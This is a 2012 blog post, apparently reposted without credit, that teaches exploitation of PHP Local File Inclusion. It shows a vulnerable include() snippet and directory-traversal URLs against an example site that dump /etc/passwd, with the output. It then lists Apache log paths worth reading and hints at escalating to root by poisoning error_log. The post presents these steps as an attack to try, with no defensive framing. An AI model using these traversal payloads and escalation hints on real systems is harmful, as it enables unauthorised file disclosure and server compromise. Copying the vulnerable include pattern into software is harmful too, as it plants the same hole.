Sabtu, 05 Mei 2012

Exploiting Local File Inclusion vulnerability(LFI)

Local File Inclusion mean loading local file such as /etc/passwd , /etc/host on the php web pages. There are many programing mistake for occurring this vulnerability. When Programer put some bad in the php web pages that time this vulnerable occur:

include
include_once
require
require_once
fopen



For example, suppose in a pages :

 
<?
$vulnerable = $_GET[vulnerable];
include($vulnerable); #this maybe require,require_once, fopen etc
?>


This is code is vulnerable to Local file inclusion vulnerable.

Suppose , Our target url is www.n00bprogammer.com/vulnerable/

If you directly submit this url on browser address bar then you get web page , That's mean there is a file "index.php"

If we try like :

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../etc/passwd (did not work)

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../../../etc/passwd

And it output :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:105:113::/var/lib/mysql:/bin/false
avahi:x:106:114::/var/run/avahi-daemon:/bin/false
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
haldaemon:x:109:117::/var/run/hald:/bin/false
kdm:x:110:65534::/home/kdm:/bin/false

That's mean it worked. But modern unix like system now does not include the hash in the /etc/passwd (All hash on /etc/shadow)... So there is no permission then you can't read /etc/shadow file.

There are many file you may interest to read :


/etc/httpd/logs/acces_log 
/etc/httpd/logs/error_log 
/var/www/logs/access_log 
/var/www/logs/access.log 
/usr/local/apache/logs/access_ log 
/usr/local/apache/logs/access. log 
/var/log/apache/access_log 
/var/log/apache2/access_log 
/var/log/apache/access.log 
/var/log/apache2/access.log
 /var/log/access_log
 
 
There are many sites which have unnecessary url variable with file extension... They use the value 
  php,images,asp file. This is not secure at all. For example :


www.target.site/vulnerable.php?=image.jpeg


This maybe also vulnerable to LFI... Try.


Advance hackers can go more deeply. Such as: 


1. There are some special way attacking application tier for rooting the system(Hint: overwriting error_log).
2. Reading more advance file (Hint: SQL).


Try them , Research and learn...
 
Read more: http://en.wikipedia.org/wiki/Remote_file_inclusion 


Let me know if you have any question please...
Diposting oleh di

1 komentar:

  1. Admin17 Juni 2013 pukul 21.27

    Why are you coping and pasting from my blog without any credit?

    BalasHapus

Langganan: Posting Komentar (Atom)